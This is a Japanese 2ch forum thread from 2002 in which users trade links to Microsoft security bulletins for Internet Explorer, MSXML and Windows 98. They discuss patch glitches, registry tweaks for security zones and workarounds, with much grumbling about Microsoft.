(2002年3月8日: 日本語情報、及び殆どのパッチ公開、最大深刻度 : 中)
 *悪意のある攻撃者から、未チェックのバッファを利用して任意のプログラムを実行される可能性があるという、
非常に危険度が高いセキュリティ・ホールです。決して、マイクロソフトの記述のように「最大深刻度 : 中」
ではありません。


463 :名無しさん@お腹いっぱい。:02/03/12 02:51
はよ文字化けバグ直せやマイクソ!!

464 :名無しさん@お腹いっぱい。:02/03/12 03:35
マイクソ
XBOX の対応で、ラオックス、サトウが、販売中止したように、
毎糞は、家電やゲームなどに、入り込む場所は ありません。
彼(ゲイツ)には「お客さま」という意識が無いのですから。

465 : :02/03/12 06:50
そんなに言うんだったらwindows使うのやめろよ

466 :名無しさん@お腹いっぱい。:02/03/12 07:06
とたんにサクサク、WARPを使え。

467 :名無しさん@お腹いっぱい。:02/03/12 08:12
>458
ええええ??
どゆこと??IEの設定メニューの中にってこと?

468 :名無しさん@お腹いっぱい。:02/03/12 08:30
>>467
セキュリティのタブ

469 :名無しさん@お腹いっぱい。:02/03/12 08:50
えええええええ!?
無いよそんなの最初ッカラ

インターネット
イントラネット
信頼済みサイト
制限付きサイト

こんだけ。
皆は違うの?

470 :__:02/03/12 09:58
>>469
ログ嫁


471 :名無しさん@お腹いっぱい。:02/03/12 10:25
あんまり古いところの >> を示すなよ
いちいちそこまでたどることは、
やらないんでね

472 :IEのパッチ:02/03/12 11:59
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする(MS02-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/

473 :445:02/03/12 12:04
>>457
違うんだけどな・・・(´・ω・`)ショボーン


474 :__:02/03/12 12:35
>>471
氏ね。
自分で調べないやつは、ここ見るなよ。

475 :名無しさん@お腹いっぱい。:02/03/12 13:11
とりあえず>>459さんのレスを見てやってみました。
要するにこれでローカルでも Java とか ActiveX とかが
動かなくなるように出来るわけですか。ふむ。

476 :名無しさん@お腹いっぱい:02/03/12 14:18
おぅ!!
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
のDWORD値"Flags"のデータ値を"1"にしたらインターネットオプションのセキュリティタブ以下に、
いままで無かった「マイコンピュータ」のアイコンが!!!
こんなのいまさら知った…
おかげでばっちり設定しました。イエイ!!

>>459
情報サンクス子!(・∀・)


477 :名無しさん@お腹いっぱい。:02/03/12 16:13
>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
>のDWORD値"Flags"のデータ値を"1"・・・
これをやるとNorton Antivirusとかおかしくならない?

478 :名無しさん@お腹いっぱい。:02/03/12 16:21
どういうふうに?

479 :名無しさん@お腹いっぱい。:02/03/12 20:48
あ!
スクリーンセーバが動かなくなったヽ(´ー`)ノ
仕方ないな もっと地味な奴に変えよう

480 :名無しさん@お腹いっぱい。:02/03/12 23:01
ネット観覧してると、いきなりFDが起動してフリーズします。
IEの故障かと思い修復したのですが、やはり同じ症状が起きます。
IE6ダウソしてから、起るような気がします、パッチは当ててません。
原因なんでしょうか?

481 :名無しさん@お腹いっぱい。:02/03/12 23:31
ほらよっ

http://www.microsoft.com/JAPAN/support/kb/articles/J052/9/81.asp
5とか6とかのゾーンも自作できるのかな?
しっかし、不明つーのはなんなんだぁぁぁぁ


482 :名無しさん@お腹いっぱい。:02/03/13 00:04
MS02-014の98用のパッチはもう当てても大丈夫?

483 :476だけど:02/03/13 00:08
調節がムズイ(;´Д`)
あんまり使いづらいんで多少緩めちまった

484 :名無しさん@お腹いっぱい。:02/03/13 00:20
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
のDWORD値"Flags"のデータ値を"1"にしてセキュリティのマイコンピュータの設定でActiveXとかjava関係
を全部無効にした状態でNAVを立ち上げると、状態の項目が更新中になったり手動でスキャンしようとしても
動かないんだけど、NAV自体は正常に機能してるのかな?今は安全なActiveXとjavaスクリプトだけ有効に
してます、この状態ならNAVも機能してるかな。


485 :名無しさん@お腹いっぱい。:02/03/13 00:59
>>482
まだダメでしょ。てゆうか、まだ公開停止中では?

486 :名無しさん@お腹いっぱい。:02/03/13 00:59
マイコンピュータの設定を下手に変えると、
Explorer及びシェルのさまざま機能、HTMLヘルプ、システム情報
などなどが正しく動かなくなるけど、知らないわよ。

487 :名無しさん@お腹いっぱい。:02/03/13 01:07
手動でスキャンしてみた。確かに異常jに時間かかって
変だった。けど結局ちゃんと終わって結果も表示されたよん。
これで良しとすべきかどうか。。

488 :名無しさん@お腹いっぱい。:02/03/13 01:23
マイコンピュータのセキュリティの設定は
●AciveXコントロールとプラグインの実行
●スクリプトを実行しても安全だとマークされているActiveXコントロールとプラグインの実行
●アクティブスクリプト
だけ有効にして、それ以外は無効にしてる。これでNortonは普段通り動いてる
感じに見えるけど、これで他に不具合が出ないかどうかは分からない。

489 :名無しさん@お腹いっぱい。:02/03/13 04:42
早速マイコンピュータの設定を見てみると
Javaの許可と安全でないActiveXコントロールのところ以外
全部有効、最高にゆるゆるの状態になっているんですけど
これってみんな初めはこうなんですか?

490 :476:02/03/13 06:59
ていうか最初はウィンドウが開けなくなったりしたぞ(w
で、「ダイアログ表示させる」にしてみたけどこれもまたいちいち聞いてきてメンドイ(;´Д`)

あんまり使いにくいんで結局全部元の状態に戻した
考えてみれば必要ない。


491 :476:02/03/13 07:00
かも…



(と、付け加えてみる)

492 :名無しさん@お腹いっぱい。:02/03/13 08:22
今までは、HDに保存したHTMLファイルはイントラネットのセキュリティで
実行されるのかと思っていた。HDに保存したUGサイトやアダルトサイトとかを
何回かIEで表示させちまったよ、、、。でJavaScriptもActiveXも全部切っ
てあるのに、ポップアップウィンドウがでてバナーが表示されたりしておかしいな?
とは思っていた。

CATVだから国際回線やQ2の心配はないからいいし、今のところ不具合はないけど、
ひそかにとトロイ仕込まれていたりしないか心配だ。
結構オンラインショッピングとかやっているからな、、、。クレジットカード番号が
心配。Q2とか国際回線の被害にあった人の話はよく聞くけど、ネットショッピング絡みで
クレジットカード番号を盗まれて被害にあった人というのはどのぐらい存在するのでしょうか?

マイクロソフトも最初からマイコンピューターの表示しといてほしかった。
そりゃ、マイコンピューターのセキュリティを厳しくしたら、トラブルがいろいろ起きて
使ってられんだろうけどとりあえずHDに保存したHTMLに対して、イントラネットの
セキュリティなんて誤解をすることがなしに、万全の注意を払うのに。
あー、鬱だ。鬱だ。いまさらだけど今週末にOSの再インストールでもするかな。

長文アンドなんの建設性もない愚痴でスマソ。

493 : :02/03/13 12:19
↑ていうか定期的にスキャンしてんだろうが
それでもまだ心配なのか???
じゃあお前はいったい何なら信用できるんだ???

理解不能だ

494 : :02/03/13 18:36
オレはもうダメだ。
テキスト修正でも日時が更新されて上に上がってくるので、
もうどれをダウンロードしていいのかわからなくなった。
せめて修正パッチの更新日時一覧表を作れや、MS氏ね

495 :名無しさん@お腹いっぱい。:02/03/13 19:06
>>494
累積パッチとそれ以降に出たパッチを入れればいい。
ダブってもいいからもう1回入れる。

496 :名無しさん@お腹いっぱい。:02/03/13 19:07
>>494 禿胴
オレはOperaにした。MS02-008のIE6用パッチがでなかなか出ないので
もう我慢できない。
ただOperaは半角カナでカキコしても全角になってしまう。

497 :名無しさん@お腹いっぱい。:02/03/13 19:12
半角カナじゃなくてもざー2とかなぜか書き込めなかった<Opera
あと、NISを使ってると突然ブルースクリーンになったりした

498 :名無しさん@お腹いっぱい。:02/03/13 19:20
>>497 スレ違いだが、Operaに http://www.moonstone.jp/ のパッチ当ててみた?

499 :名無しさん@お腹いっぱい。:02/03/13 19:25
>>498 いや、膳々。こんなのあったのか。さんくす。

500 :名無しさん@お腹いっぱい。:02/03/13 19:55
>497
スレ違いヤメレー

501 :ななしさーん:02/03/14 07:35
SNMP サービスに含まれる未チェックのバッファにより、任意のコードが実行される (MS02-006)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-006.asp

パッチでました。

というか、SNMPってなんですか?(汗

502 :名無しさん@お腹いっぱい。:02/03/14 12:40
http://www.forest.impress.co.jp/article/2002/03/11/windowsbug.html
なお同社では、8日の時点でWindows 2000用のほかに、
Windows 98/NT 4.0用の修正プログラムを公開したが、
Windows 98/NT 4.0にこの修正プログラムを適用すると
“ファイル名を指定して実行”などの一部のダイアログで文字化けが
生じる不具合が見つかり、11日深夜になって公開を中止した。
同社によると、不具合を直した新しい修正プログラムは現在開発中で、
数日中に公開する予定だという。

このスレの人柱さん達に敬礼ッ・・・
(´・ω・`)ショボーン

503 :名無しさん@お腹いっぱい。:02/03/14 12:52
NTに入れたらところどころ英語になったんだけどなあ

504 :名無しさん@お腹いっぱい。:02/03/14 13:42
>>481
ゾーンの自作はできるらしい
以前Win板で見かけた

505 :名無しさん@お腹いっぱい。:02/03/14 16:57
あっ、私のパソの文字化けひょっとしてこのせいなのかな??
マイコンピュータの「Cのプロパティ」の画面が一部変な
文字になってるんだよね。
全然関係ないか。

506 :cheshire-cat:02/03/14 20:14
http://www.nai.com/japan/virusinfo/virE.asp?v=Exploit-CodeBase&menu=ThisPagePrintVersion

「xploit-CodeBaseとは、Microsoft Internet Explorerのデータバインディング脆弱性を検出したときの一般的な検出名。この脆弱性は2002年2月25日に発見された。」って書いてる。
これってMS02-009のことか?日付が。

507 :名無しさん@お腹いっぱい。:02/03/15 01:56
>>506 3/8時点でパッチは無いっていってるから違うだろ。
つかhttp://ime.nu/www.nai.com/japan/virusinfo/virE.asp?v=Exploit-CodeBase&menu=ThisPagePrintVersion
とMS02-009は俺の貧弱な感性ではどうしても繋がらないんだが。

508 :__:02/03/15 17:11
MS02-014のパッチが再発行されたよ!!
http://www.microsoft.com/japan/technet/security/bulletin/MS02-014.asp


変更履歴
2002/3/8: このセキュリティ情報ページを公開しました。

2002/3/15: この問題に対する Windows NT 4.0 (Active Desktop 使用環境) および
Windows 98/98 Second Edition の日本語版修正プログラムを更新しました。
また、Windows NT 4.0 (Active Desktop を使用していない環境用) の日本語版修正
プログラムを公開しました。


509 :名無しさん:02/03/15 19:01
>>508
ショートカットアイコンの矢印を薄くしたり、なくしたりのカスタマイズが
できないまま。

510 :名無しさん@お腹いっぱい。:02/03/15 20:40
>>508
難しくてよくわかりません。
Win98でサーバー立ててないネットしかしてない人は、
パッチ当てなくて大丈夫なの?
影響なしってあるけど。クライアント システムだけ中ってあるなあ。
クライアントシステムってなんなんだろう。

511 :名無しさん@お腹いっぱい。:02/03/15 20:47
>>510
2ちゃんねる→インターネットサーバー
社内サーバー→イントラネットサーバー
普通の人→クライアントシステム

多少の英語とネットワークの基礎くらい理解してきなさい

512 :cheshire-cat:02/03/15 21:55
>>507
漏れ的には一瞬、アリだと思ったんだけど。
「実行ファイルが起動」、という説明と日付、引っかかって。

513 :名無しさん@お腹いっぱい。:02/03/15 22:52
>>509
禿同 困ったな

514 :名無しさん@お腹いっぱい。:02/03/15 23:46
>>509
>>513
Win9Xなら、環境設定ってフリーソフトで、ショートカットの矢印が消せる。
どうやらTweakUIと違う事やってるようなので、TweakUIで効かなくても、
こっちで消せた。当方Win98SE。

ttp://www5a.biglobe.ne.jp/~nobukich/index_j.htm
↑ここからダウソ。

515 :MSまともにパッチ当てろニダ:02/03/16 00:29
>>514
消すんじゃなくて薄くしたいニダ
TWEAKUI.CPLの薄いショートカットアイコンにしたいニダ
窓の手で出来てたけどディフォルトの濃いショートカットアイコンになるニダ
たぶんレジストリ見ないでシュートカットアイコンかぶせてるニダ
バグか仕様かかわらんニダ
たぶんMSはサポート外で仕様と言うニダ
いやだニダ


516 :514:02/03/16 03:00
>>515
各ショートカットアイコンを薄い矢印付きで自作して、システムが付ける矢印は
消す。

うーん。514で挙げたツール以外の環境変更ツールで、薄い矢印付けるってのは
無いかな?オレは矢印消す人なんで、困らないから探す気無いんだが…。

517 :名無しさん@お腹いっぱい。:02/03/16 12:18
オンラインスキャンしたら
JS_EXCEPTION.GENに感染してました。
特に症状っぽいのは今のところでてませんが
今から駆除ります。
だれか、症状がでたという人がいたら
どんな症状なのか教えてください

518 :名無しさん@お腹いっぱい。:02/03/16 12:30
>>517
聞く前に検索してみるという知恵はまわらんのか?
http://www.google.co.jp/search?hl=ja&ie=Shift_JIS&oe=Shift_JIS&q=JS_EXCEPTION.GEN&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

519 :+anonymous:02/03/16 12:52
>>517
マルチだったのか

520 :名無しさん@お腹いっぱい。:02/03/17 01:32
MS02-014
>この修正プログラムがマシンに正しくインストールされたことを確認するために
>は、[スタート]、[ファイル名を指定して実行] を選択し、QFECheck ユーティ
>リティを起動してください。修正プログラムがインストールされている場合は、
>インストールされた修正プログラムのリストに "Windows 98 Q313829 Update"
>が表示されます。

正常にインストールされましたって窓が出たんだけどQFECheck ユーティリティを
見ても0313829が表示されてない。これってやっぱりインストールされてないですよね?心配です。

521 :名無しさん@お腹いっぱい。:02/03/17 01:40
IE のバージョンを見れ

522 :名無しさん@お腹いっぱい。:02/03/17 10:06
>>520
qfecheckにファイルの検索がある

523 :名無しさん@お腹いっぱい。:02/03/17 11:32
>>522
qfecheckでsearchしてもqfecheckには追加されませんね

ieのバージョンにq313829と追加されていることを確認できます。

詰めが甘いねMSは


524 :名無しさん@お腹いっぱい。:02/03/17 11:52
同意
ほんとにMSはクソ
いまごろqfecheckしても確認できないというクレーム
が寄せられていると思われる
次のお詫び文出るまで何日かかるのでせうか?(w

525 : :02/03/17 16:04
>>522は疑問と質問の意味が解ってないと思われ

526 :名無しさん@お腹いっぱい。:02/03/17 22:55
MSのヘルプデスクでフィドバックフォームに記入して
送信できないよ
こないだはできたのに
クレーム受付拒否か? MSは

527 :名無しさん@お腹いっぱい。:02/03/17 22:55
[2453] Re: およよ。
naoco さん 2002/03/17(Sun) 22:28
[f-kyoto-215072.zero.ad.jp] Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

ドコモの子会社で働いてたころ、
PHSには今後力をいれんって力説された覚えが。

展示会とかでも、PHS用の場所って畳1枚分もなかったし。


528 :名無しさん@お腹いっぱい。:02/03/18 16:38
>>520
その文章↓のように書き換えられてるよ。まるで何事もなかったかのように・・
ほんとクソ会社だな 北朝鮮以下だ

>Windows 98 および 98 SE :
この修正プログラムがマシンに正しくインストールされたこと
を確認するためには、c:\windows\system フォルダにある
Shell32.dll のバージョン情報を確認してください。
修正プログラムがインストールされている場合には、
Shell32.dll のバージョンが、4.72.3812.600 になります。

529 :北朝鮮「「未満」」!!!!!!!!!!!!:02/03/18 18:04


530 :名無しさん@お腹いっぱい。:02/03/18 21:43
やっぱりバックレたな 

531 :名無しさん@お腹いっぱい。:02/03/18 22:22
MSクソだな、あ〜Macが欲しい

532 :cheshire-cat:02/03/18 22:23
>>528
漏れMSは信頼してないけど。
「より快適に使うためのアップデートです」、なんてふざけた名目で、密かにパッチ当てさせる某社の方が嫌だ。

533 :名無しさん@お腹いっぱい。:02/03/18 22:57
>>528 532
今回の件や
http://news.2ch.net/test/read.cgi/newsplus/1016455358/
でMSほんとに嫌いになった
Linuxも半端だし、マクーも訳わかんない方向に行ってるし
変われるOS有れば換えたい
やっぱQNXしかないか・・・

534 :cheshire-cat:02/03/18 23:04
>>533
超漢字とか。
でも漏れ、漢字苦手だから使いこなせそうにないか(鬱

535 :名無しさん@お腹いっぱい。:02/03/18 23:42
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html

Microsoft Internet Explorer 6 には、さまざまな環境下において
ユーザの意思に関係なく、ファイルを自動的に ダウンロードし、
かつ、それを自動的に実行してしまう問題があります。
悪意ある Web サイトの管理者はこの問題を利用することのできる
悪意あるコンテンツを設置し、ユーザが Internet Explorer 6 を利用して
このコンテン ツにアクセスした場合に、
この管理者が指定した任意のプログラムはユーザのシステム上に
自動的にダウンロードされ、かつ、自動的に実行されてしまう可能性があります。

回避策:
インターネットオプション]から適切なゾーンに対して
[ファイルのダウンロード]を無効にすることでこの問題を回避することができます。


536 :名無しさん@お腹いっぱい。:02/03/19 17:55
マタカ

537 :名無しさん@お腹いっぱい。:02/03/19 18:06
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20020319/1/

538 :名無しさん@お腹いっぱい。:02/03/19 21:19
はよパッチ用意せんかい!
相変らずダンマリを決め込むのは体質だな コメントくらいさっさと出せ!
↑のように文章の差し替えも隠れてやるし
陰険な会社だ はよつぶれろ! 
奢れる者久しからず 満つれば欠くる 祇園精舎の鐘の声・・

539 :名無しさん@お腹いっぱい。:02/03/19 22:31
これは仕様です これは仕様です これは仕様です

これは仕様です これは仕様です これは仕様です

これは仕様です これは仕様です これは仕様です

これは仕様です これは仕様です これは仕様です

これは仕様です これは仕様です これは仕様です

540 :名無しさん@お腹いっぱい。:02/03/19 22:49
どっかのスレで、マイクロソフトは今月はバグ取り強化月間って見たなあ。
バグ強化月間だったのか(ワラエナイ

541 :名無しさん@お腹いっぱい。:02/03/19 22:52
みなさん、こんばんは。
明日の夜から、札幌に行きますので、靴日記等の更新は24日まで出来ない可能性が高いので、ご了承願います。
掲示板には、登場するつもりです。
宴に履く靴は決めていないのですが、普段履き用はやはりウェストンのゴルフにほぼ決定しました。
頑丈で連続着用にも耐えますし、カジュアルには丸みを帯びたシルエットがとてもマッチします。
フッ素加工アッパーとラバーソールで完全武装されているので、どんな天気でも気にしないですみます。
とにかく、この靴さえあれば、カジュアルには安心です。
・・・、でも、宴の当日に雨が降ったら困るので、ロジェにしようかなとも、フト思いました。



542 :名無しさん@お腹いっぱい。:02/03/20 12:20
>535
> 回避策:
> インターネットオプション]から適切なゾーンに対して
> [ファイルのダウンロード]を無効にすることでこの問題を回避することができます。

ちなみに、この設定やってもWindows Updateは正常に動作するんだよなぁ。
本当にこれで対策になっているのか、甚だ疑問だ。

543 :名無しさん@お腹いっぱい。:02/03/20 12:49
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】
http://pc.2ch.net/test/read.cgi/sec/1016485189/l50

544 :名無しさん@お腹いっぱい。:02/03/21 09:48
>>542
それはC:\WINDOWS\Downloaded Program Files内にキャッシュされた
アップデートエンジンで動作しているためでは?

545 :名無しさん@お腹いっぱい。:02/03/21 12:00
>534
それはネタか?(w
食わず嫌いせずにBTRONもくうだよ

うちは、アプリ少ない欠点はあるけど、
Webブラウズの専用端末としてなら、
導入してもいいかと考え中
セキュ穴ばっかで鬱になるよりもいいかな・・・と


546 :名無しさん@お腹いっぱい。:02/03/22 16:06
いい日旅立ち

547 :名無しさん@お腹いっぱい。:02/03/25 12:03
振り返れば奴がいる

548 :名無しさん@お腹いっぱい。:02/03/27 01:14
或る日突然(トワ・エ・モア)

549 :MS02-015:02/03/29 10:36
http://www.microsoft.com/japan/technet/security/bulletin/ms02-015ov.asp
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の累
積的な修正プログラム
http://www.microsoft.com/japan/technet/security/bulletin/ms02-005.asp
で修正された問題に加えて、新たに 2 つの問題を排除します。


550 :名無しさん@お腹いっぱい。:02/03/29 11:05
MS02-008のMicrosoft XML Core Services 2.6 と 3.0 の日本語版修正プログラム
はまだか。はやくパッチかIE6.0SP1を出して欲しいぞ。

551 :_:02/03/29 11:07
Opera使おう。もうIE使ってられないな。
IEは5か5.5か、6どれが良いんだろう。
5.5かな?

552 :名無しさん@お腹いっぱい。:02/03/29 11:29
Operaは軽くて速いからいいね。IE6.0と使い分けてるよ。

553 :IEの累積的パッチ:02/03/29 12:20
「米MSがIEの新しいパッチを公開,ただし ふさげないセキュリティ・ホールも」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020329/1/

554 :状況報告:02/03/29 17:20
MS02-015のパッチ入れました。
今のところ不具合は無いです。

555 :名無しさん@お腹いっぱい。:02/03/29 17:42
Q306121;Q313675;Q316059;Q313829;Q319182って・・・
早くSP3出しましょうよ

556 :cheshire-cat:02/03/29 18:35
>>550
同志!!!

557 :名無しさん@お腹いっぱい。:02/03/29 19:21
>>550
>>556
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020322

558 :名無しさん@お腹いっぱい。:02/03/29 19:31
>>552
Operaは文字化けパッチやお気に入りなどの問題があって面倒だなあ。

ネスケ仕様のドーナツが出たら一番いいんだが。

559 :cheshire-cat:02/03/29 19:47
>>557
ありがと。多謝なんだけど。
じゃなくて漏れが今MS02-008入れてないのは、technetで「入れてもいいけど、SP出るまで待ったほうがいいかも」的な表現だったからで。この自信無さげな文章、心に引っかかって。

「IE6SP1期待アゲの会」に一緒に入りませんか?

560 :名無しさん@お腹いっぱい。:02/03/29 20:00
インプレス関係から記事が消えた...

MS側の不手際で取り下げ?もうインストールしたのに...

561 :名無しさん@お腹いっぱい。:02/03/29 20:21
>>552 お気に入りはインポートできまっせ。IEと併用してるのでしょっちゅう
インポートして同期してます。
漏れも「IE6SP1期待アゲの会」賛成!

562 :名無しさん@お腹いっぱい。:02/03/30 00:11
InternetExplorerの深刻なセキュリティホールを修正する累積的な修正プログラム


ZDNN:速報:MS,IEのセキュリティホール修正パッチを公開
http://www.zdnet.co.jp/news/bursts/0203/29/04.html

今回リリースされた修正パッチは,「危険度中」とされる
「悪意のあるユーザーが指定したプログラムを自動的に実行することができる」に加え,
「危険度高」の「IEのゾーン判定を回避して不正なゾーンでスクリプトを実行することができる」
という深刻なセキュリティホールを修正するもの。

MS02-015 に関する情報
http://www.microsoft.com/japan/technet/security/bulletin/ms02-015ov.asp?frame=true

この修正プログラムは、Internet Explorer に影響を及ぼす
セキュリティ上の問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 2 つの問題を排除します。


(対象となる製品)

Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.5 Service Pack 1
Internet Explorer 5.01 Service Pack 2 (WWindows 2000 、Windows NT4.0 に組み込まれているもののみ)
注意: Internet Explorer 5.01 Service Pack 2 の修正プログラムは、Windows 2000 、Windows NT4.0
Service Pack 6a 環境でのみ適用可能です。

(詳細)

ディスク上の任意のファイルの読み取ります。
意図しないスクリプトが実行されます。
アプリケーションが実行されます。 (ハードディスクのフォーマットなど)
Windows が異常停止します。

563 :名無しさん@お腹いっぱい。:02/03/30 00:37
>>562 超ガイシュツと思うけど…

564 :名無しさん@お腹いっぱい。:02/03/30 08:43
人柱くんの報告では特段不具合が出てないみたいだから
新しいパッチ当てたわな

565 :名無しさん@お腹いっぱい。:02/03/30 08:46
みずほ銀行誕生、システムは大丈夫か?
581店・3万人・70兆円…処理が最大の懸案
 日本興業、第一勧業、富士の3行が来月1日から、「みずほ銀行」と
「みずほコーポレート銀行」に再編される。メガバンク誕生前夜、看板
かけ替えやパンフレット入れ替えなど休日返上で新たな船出に備えるこ
とになる行員も多い。なかでも最大の懸案はコンピューターシステムの
統合だ。「Y2K並みの勤務態勢で万全を期す」(広報担当)と緊張が
高まっている。



566 :名無しさん@お腹いっぱい。:02/03/30 11:23
ファイルの自動ダウンロード、実行問題は修正されず


http://www.forest.impress.co.jp/article/2002/03/29/iepatch.html

567 :名無しさん@お腹いっぱい。:02/03/30 11:23
Internet Explorer 5.5 SP2
- http://www.asia.microsoft.com/downloads/release.asp?ReleaseID=32082
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-009.asp
- http://www.microsoft.com/japan/technet/security/bulletin/ms02-015.asp

Internet Explorer 6
- http://www.asia.microsoft.com/japan/ie/downloads/ie6/
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-008.asp (Windows Update)
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-009.asp
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-015.asp

後ろ向きな追加対策
- インターネットゾーン - ダウンロード「無効」(Irvine 等で代用)
- regsvr32 /u mstime.dll 元に戻す場合 regsvr32 mstime.dll
- スクリプト切るとポータル系が見れないという苦情がウザイので切らない

前向きな追加対策
- Interscan の導入
- 一時的に Netscape 6.2 へ移行

568 :名無しさん@お腹いっぱい。:02/03/31 03:54
> - regsvr32 /u mstime.dll 元に戻す場合 regsvr32 mstime.dll
対応済み
> - スクリプト切るとポータル系が見れないという苦情がウザイので切らない
切らなかったらmstimeを切ってもまったく意味ないだろ
少しは自分の頭で考えられんのか

569 :名無しさん@お腹いっぱい。:02/03/31 06:50
IE6なんですけどこれなんとかなりませんか?
q306121;q312461;q313675;q316059;q319182
IE6のSP1っていつ出るんですか?

570 :名無しさん@お腹いっぱい。:02/03/31 07:42
>>569は知的障

571 :名無しさん@お腹いっぱい。:02/03/31 09:24
>569
q313829は?

572 :名無しさん@お腹いっぱい。:02/03/31 14:07
>>569
多分当分出ない




573 :名無しさん@お腹いっぱい。:02/04/01 10:16
>>568
スクリプト切りは強制しないが自己の判断でやってくれっつーことで。
html + time は強制切りしないとスクリプト切りやっても意味ないでしょ。

で、こうするよ。

- パッチ適用のみで他の対策無し
- 喰らったら喰らったで、喰らったやつの責任。自分でどうにかしろ
- virus detect 時、SMTP traffic は Outbound Block

他所様に迷惑かけない仕様。ダメけ?


574 :567=573:02/04/01 15:47
対応済みって MS02-005 かぁ。調査不足スマソ。

575 :XML Core Services 2.6 および 3.0 の日本語版修正プログラム:02/04/02 16:25
すでにリリースされていたXML Core Services 2.6 および 3.0 の日本語版修正
プログラム(MS02-008)が正式に公表された。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS02-008

この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
・ Microsoft XML Core Services 4.0:
http://download.microsoft.com/download/xml/Patch/Q317244/W9X2KMeXP/JA/msxml4qfe.exe
・ Microsoft XML Core Services 3.0:
http://download.microsoft.com/download/xml/Patch/3.0/W9XNT4MeXP/EN-US/Q318203_MSXML30_x86.exe
・ Microsoft XML Core Services 2.6:
http://download.microsoft.com/download/xml/Patch/2.6/W9XNT4MeXP/EN-US/Q318202_MSXML20_x86_en.exe


576 :名無しさん@お腹いっぱい。:02/04/02 18:49
OSが98SE、ブラウザがIE6.0の場合、
3.0を入れればいいんですよね?

577 :名無しさん@お腹いっぱい。:02/04/02 20:04
>>576
そうです

578 :MSXMLバージョン確認方法:02/04/02 20:45
http://www.forest.impress.co.jp/article/2002/04/02/xmlcoreservicepatch.html

自分の環境に「MSXML」がインストールされているか確認する最善の方法は、
Widowsのシステムディレクトリに「MSXML」の関連ファイルがあるか確認すること
だという。

具体的には“C:\Windows\system32\”または“C:\Winnt\system32\”に、
“MSXML2.DLL”というファイルがあれば「MSXML」v2.6が、“MSXML3.DLL”という
ファイルがあれば「MSXML」v3.0が、“MSXML4.DLL”というファイルがあれば
「MSXML」v4.0がインストールされていることになる。修正プログラムは「MSXML」
のバージョンごとに別々のファイルで公開されており、複数のバージョンの「MS
XML」がインストールされている場合は、それぞれ対応する修正プログラムを
適用しておく必要がある。

579 :名無しさん@お腹いっぱい。:02/04/02 23:50
 ↑
 自分の場合は、C:\Windows\system32ではなく、C:\Windows\systemに
ありました。
 ちなみに、OSは98SE、ブラウザはIE6.0です。


580 :576:02/04/03 00:15
>>577>>578
さんくす。

>>579
私も探してみたらC:\Windows\systemにありました。
以前C:\Windows\system32を探して無かったから念のために聞いたのですが。
M$のあほー。

581 :名無しさん@お腹いっぱい。:02/04/03 14:08
Javaのセキュリティホールって確かプロキシの問題だけだったはずだけど
いつのまにかバイトコードベリファイアの問題が追加されてる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-013.asp
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/218&type=0&nav=sec.sba
http://home.netscape.com/security/
これはサンドボックスを突破してコードを実行できるというもので
MS02-013は危険度が「高」に変わってる。
国内ソースでこれを報道したものってある?

582 :名無しさん@お腹いっぱい。:02/04/03 16:42
>579,580
なるほど・・
system32になかったから関係ねーやと放っておいたのだが
確かにsystemで検索すればMSXML3が出てきたわな
それにしても謎めいた会社よのう 危険度高の割りには 
このスレ見なきゃ放置だったよ オレみたいなトーシロは・・

583 :名無しさん@お腹いっぱい。:02/04/03 16:53
まあ、エキスプローラで「MSXML*」を検索したほうがいいってことですな。

584 :cheshire-cat:02/04/03 18:36
他のスレで既出かもしれないけど。

IE6丸ごと入れたCD-Rを家に忘れたんで、職場でIE6をDLしようとした。
「ダウンロードの場所情報は壊れています。IEブラウザのキャッシュをクリアにしてから、セットアップを再実行してください」
「ダウンロードサイトの情報が取得できませんでした」

こんな素敵なエラーがでる。
MSに問い合わせたら、鯖が落ちていて現在復旧作業中とのこと。
早よ治さんかい。

585 : :02/04/04 01:28
>>584
ぁ、それと同じ質問がどっかに・・・
microsoft側のミスだったのか。

586 :名無しさん@お腹いっぱい。:02/04/04 13:56
>>579,580,582

その件もまた↓のようにコッソリ書き換えしてやがんの
昨日までsystem32で調べろとしか書いてなかったのに(w

>修正プログラムの適用が必要かどうかの判断には、よく寄せられる質問
マイクロソフトセキュリティ情報(MS02-008) の修正プログラムの適用が
必要であるかどうかはどのように分かるのですか? をご覧ください。

でそこ見たら「system32またはsystem」に直してやがんの
